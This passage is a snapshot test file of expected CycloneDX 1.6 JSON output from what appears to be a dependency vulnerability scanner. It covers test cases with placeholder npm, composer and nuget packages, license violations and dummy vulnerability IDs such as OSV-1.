"1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "UNKNOWN" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } }, { "license": { "id": "Apache-2.0" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2", "type": "library", "name": "mine2", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine2" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/deprecated-pkg@1.0.0", "type": "library", "name": "deprecated-pkg", "version": "1.0.0", "licenses": [], "purl": "pkg:npm/deprecated-pkg@1.0.0", "properties": [ { "name": "deprecated", "value": "true" } ] } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [ { "license": { "id": "ISC" } } ], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@5.9.0", "type": "library", "name": "mine2", "version": "5.9.0", "licenses": [ { "license": { "id": "MIT" } } ], "purl": "pkg:npm/mine2@5.9.0" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" }, { "bom-ref": "pkg:npm/mine1@1.3.5", "type": "library", "name": "mine1", "version": "1.3.5", "licenses": [], "purl": "pkg:npm/mine1@1.3.5" }, { "bom-ref": "pkg:npm/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:npm/mine2@3.2.5" }, { "bom-ref": "pkg:npm/mine3@0.4.1", "type": "library", "name": "mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:npm/mine3@0.4.1" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1@1.2.2", "type": "library", "name": "mine1", "version": "1.2.2", "licenses": [], "purl": "pkg:npm/mine1@1.2.2" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:composer/author1/mine1@1.2.3", "type": "library", "name": "author1/mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:composer/author1/mine1@1.2.3" }, { "bom-ref": "pkg:composer/author3/mine3@0.4.1", "type": "library", "name": "author3/mine3", "version": "0.4.1", "licenses": [], "purl": "pkg:composer/author3/mine3@0.4.1" }, { "bom-ref": "pkg:npm/mine1", "type": "library", "name": "mine1", "licenses": [], "purl": "pkg:npm/mine1" }, { "bom-ref": "pkg:nuget/mine2@3.2.5", "type": "library", "name": "mine2", "version": "3.2.5", "licenses": [], "purl": "pkg:nuget/mine2@3.2.5" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-2", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something less scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-3", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something mildly scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-5", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/multiple_sources_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/no_sources - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_no_packages - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scarier!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "OSV-1", "references": [], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] } ] } --- [TestPrintCycloneDXResults/CycloneDX16_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.6.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.6", "version": 1, "components": [ { "bom-ref": "pkg:npm/mine1@1.2.3", "type": "library", "name": "mine1", "version": "1.2.3", "licenses": [], "purl": "pkg:npm/mine1@1.2.3" } ], "vulnerabilities": [ { "id": "GHSA-123", "references": [ { "id": "OSV-1", "source": {} } ], "ratings": [ { "vector": "1" } ], "description": "Something scary!", "advisories": [], "credits": { "organizations": [] }, "affects": [] }, { "id": 